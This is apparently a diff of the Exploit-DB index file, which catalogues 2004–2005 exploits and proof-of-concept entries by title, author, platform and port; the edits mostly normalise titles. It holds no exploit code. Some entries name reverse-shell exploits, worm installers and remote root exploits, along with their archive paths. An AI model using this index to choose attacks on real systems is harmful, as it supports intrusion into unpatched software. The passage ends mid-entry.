659,platforms/cgi/webapps/659.txt,"EZshopper- Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 @@ -526,7 +526,7 @@ id,file,description,date,author,platform,type,port 677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam <= 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Local Root Exploit",2004-12-08,"Jonathan Bringhurst",osx,local,0 -681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 +681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 684,platforms/linux/local/684.c,"TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)",2004-12-14,CoKi,linux,local,0 @@ -534,17 +534,17 @@ id,file,description,date,author,platform,type,port 686,platforms/linux/dos/686.c,"Linux Kernel <= 2.6.9 / 2.4.22-28 - (igmp.c) Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit",2004-12-15,x90c,hardware,dos,0 -689,platforms/multiple/remote/689.pl,"wget <= 1.9 - Directory Traversal exploit",2004-12-15,jjminar,multiple,remote,0 +689,platforms/multiple/remote/689.pl,"wget <= 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 690,platforms/linux/dos/690.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 691,platforms/linux/dos/691.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 692,platforms/linux/dos/692.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 -693,platforms/windows/remote/693.c,"Ability Server <= 2.34 Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 +693,platforms/windows/remote/693.c,"Ability Server <= 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0 697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 to 5.3 paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0 -700,platforms/windows/dos/700.html,"MS Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0 +700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0 701,platforms/aix/local/701.sh,"AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution",2004-12-21,cees-bart,aix,local,0 702,platforms/php/webapps/702.pl,"phpBB highlight Arbitrary File Upload (Santy.A)",2004-12-22,N/A,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 @@ -557,13 +557,13 @@ id,file,description,date,author,platform,type,port 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 -719,platforms/windows/remote/719.txt,"MS Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 +719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,N/A,php,webapps,0 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,N/A,php,webapps,0 726,platforms/windows/remote/726.c,"Netcat v1.1 - ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 -730,platforms/windows/remote/730.html,"MS Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 +730,platforms/windows/remote/730.html,"Microsoft Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 @@ -573,13 +573,13 @@ id,file,description,date,author,platform,type,port 740,platforms/php/webapps/740.pl,"phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 741,platforms/linux/local/741.pl,"HTGET <= 0.9.x Local Root Exploit",2005-01-05,nekd0,linux,local,0 742,platforms/windows/dos/742.c,"Gore <= 1.50 Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0 -743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0 +743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 - Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0 744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation",2005-01-07,"Paul Starzetz",linux,local,0 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101 -753,platforms/windows/remote/753.html,"MS Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 +753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 755,platforms/windows/dos/755.c,"Breed <= patch #1 zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 756,platforms/linux/local/756.c,"Exim <= 4.41 dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0 @@ -590,16 +590,16 @@ id,file,description,date,author,platform,type,port 762,platforms/osx/dos/762.c,"Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey <= 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 -765,platforms/windows/remote/765.c,"MS Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 +765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0 -771,platforms/windows/remote/771.cpp,"MS Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 +771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) configdir Remote Command Execution Exploit (perl code)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 -775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 +775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 uselib() Privilege Elevation Exploit",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 @@ -650,7 +650,7 @@ id,file,description,date,author,platform,type,port 825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP Unauthorized ""USER"" Remote BoF Exploit",2005-02-18,class101,windows,remote,21 -828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 +828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 File Request Format String Remote Exploit (win)",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803 @@ -660,7 +660,7 @@ id,file,description,date,author,platform,type,port 835,platforms/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 837,platforms/windows/local/837.c,"Chat Anywhere 2.72a Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 -838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 - 6.5 - Directory Traversal and Denial of Service exploit",2005-02-24,karak0rsan,multiple,dos,0 +838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 - 6.5 - Directory Traversal and Denial of Service Exploit",2005-02-24,karak0rsan,multiple,dos,0 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 ""cl_guid"" - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 @@ -686,9 +686,9 @@ id,file,description,date,author,platform,type,port 863,platforms/windows/local/863.cpp,"RealPlayer 10 "".smil"" File Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability",2005-03-07,"Filip Groszynski",php,webapps,0 -866,platforms/php/webapps/866.c,"paNews 2.0b4 Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 +866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 867,platforms/multiple/dos/867.c,"Ethereal <= 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 -868,platforms/windows/remote/868.cpp,"MS Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 +868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) <= 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 @@ -706,7 +706,7 @@ id,file,description,date,author,platform,type,port 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380 884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 -886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 +886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service Exploit",2005-03-17,"Tal Zeltzer",windows,dos,0 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 @@ -720,12 +720,12 @@ id,file,description,date,author,platform,type,port 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25 -901,platforms/php/webapps/901.pl,"PunBB version <= 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 +901,platforms/php/webapps/901.pl,"PunBB <= 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 902,platforms/linux/remote/902.c,"mtftpd <= 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 904,platforms/linux/dos/904.c,"Linux Kernel <= 2.6.10 - Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit",2005-04-01,class101,windows,local,0 -906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x- Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 +906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0 909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow Exploit (3)",2005-04-12,class101,windows,remote,42 @@ -745,11 +745,11 @@ id,file,description,date,author,platform,type,port 924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 926,platforms/linux/local/926.c,"Linux Kernel 2.4 / 2.6 - bluez Local Root Privilege Escalation Exploit (3)",2005-10-26,qobaiashi,linux,local,0 -927,platforms/windows/local/927.c,"MS Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 +927,platforms/windows/local/927.c,"Microsoft Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 -929,platforms/windows/local/929.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0 -930,platforms/windows/remote/930.html,"MS Internet Explorer DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 -931,platforms/windows/dos/931.html,"MS Internet Explorer DHTML Object Handling Vulns (MS05-020)",2005-04-12,Skylined,windows,dos,0 +929,platforms/windows/local/929.py,"Microsoft Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-12,"Tal Zeltzer",windows,local,0 +930,platforms/windows/remote/930.html,"Microsoft Internet Explorer DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 +931,platforms/windows/dos/931.html,"Microsoft Internet Explorer DHTML Object Handling Vulns (MS05-020)",2005-04-12,Skylined,windows,dos,0 932,platforms/windows/local/932.sql,"Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit",2005-04-13,"Esteban Fayo",windows,local,0 933,platforms/windows/local/933.sql,"Oracle Database PL/SQL Statement Multiple SQL Injection Exploits",2005-04-13,"Esteban Fayo",windows,local,0 934,platforms/linux/remote/934.c,"gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit",2005-04-13,Xpl017Elz,linux,remote,2525 @@ -759,33 +759,33 @@ id,file,description,date,author,platform,type,port 938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 httpd Remote Buffer Overflow Exploit",2005-04-14,vade79,linux,remote,81 -941,platforms/windows/dos/941.c,"Yager <= 5.24 Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0 +941,platforms/windows/dos/941.c,"Yager <= 5.24 - Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution Exploit",2005-04-18,"Michael Krax",windows,remote,0 -944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 +944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server (GET Request) Remote BoF Exploit",2005-04-24,cybertronic,windows,remote,80 -946,platforms/multiple/dos/946.c,"PostgreSQL <= 8.01 Remote Reboot Denial of Service Exploit",2005-04-19,ChoiX,multiple,dos,0 -947,platforms/windows/remote/947.pl,"MS Exchange Server Remote Code Execution Exploit (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 +946,platforms/multiple/dos/946.c,"PostgreSQL <= 8.01 - Remote Reboot Denial of Service Exploit",2005-04-19,ChoiX,multiple,dos,0 +947,platforms/windows/remote/947.pl,"Microsoft Exchange Server Remote Code Execution Exploit (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX <= 1.0c20 Local Buffer Overflow Exploit",2005-04-21,sk,linux,local,0 -951,platforms/windows/local/951.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-22,"Jean Luc",windows,local,0 +951,platforms/windows/local/951.py,"Microsoft Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-22,"Jean Luc",windows,local,0 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional https Remote BoF Exploit",2005-04-25,CorryL,windows,remote,8080 -953,platforms/windows/remote/953.c,"Yager <= 5.24 Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 +953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21 956,platforms/multiple/dos/956.c,"Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0 -960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 +960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool <= 7.5.00.23 - Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 963,platforms/windows/local/963.c,"GoText 1.01 Local User Informations Disclosure Exploit",2005-04-28,Kozan,windows,local,0 964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 965,platforms/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 966,platforms/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 -967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit",2005-04-29,ATmaCA,windows,remote,21 -968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)",2005-04-29,c0d3r,windows,remote,21 -969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)",2005-04-29,darkeagle,windows,remote,21 +967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit",2005-04-29,ATmaCA,windows,remote,21 +968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (2nd)",2005-04-29,c0d3r,windows,remote,21 +969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow Exploit (3rd)",2005-04-29,darkeagle,windows,remote,21 970,platforms/linux/remote/970.c,"Snmppd SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 971,platforms/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 Local Privilege Escalation Exploit",2005-04-29,"Jerome Athias",windows,local,0 972,platforms/solaris/local/972.c,"Solaris 10.x ESRI Arcgis Local Root Format String Exploit",2005-04-30,"Kevin Finisterre",solaris,local,0 @@ -805,12 +805,12 @@ id,file,description,date,author,platform,type,port 987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0 989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 -990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow",2005-05-17,nolimit,windows,remote,20031 -996,platforms/php/webapps/996.pl,"ZPanel <= 2.5b10 Remote SQL Injection Exploit",2005-05-17,RusH,php,webapps,0 +990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow",2005-05-17,nolimit,windows,remote,20031 +996,platforms/php/webapps/996.pl,"ZPanel <= 2.5b10 - Remote SQL Injection Exploit",2005-05-17,RusH,php,webapps,0 997,platforms/linux/local/997.sh,"Linux Mandrake <= 10.2 - cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0 998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 -1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 +1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 - Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 @@ -833,8 +833,8 @@ id,file,description,date,author,platform,type,port 1021,platforms/linux/remote/1021.c,"Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 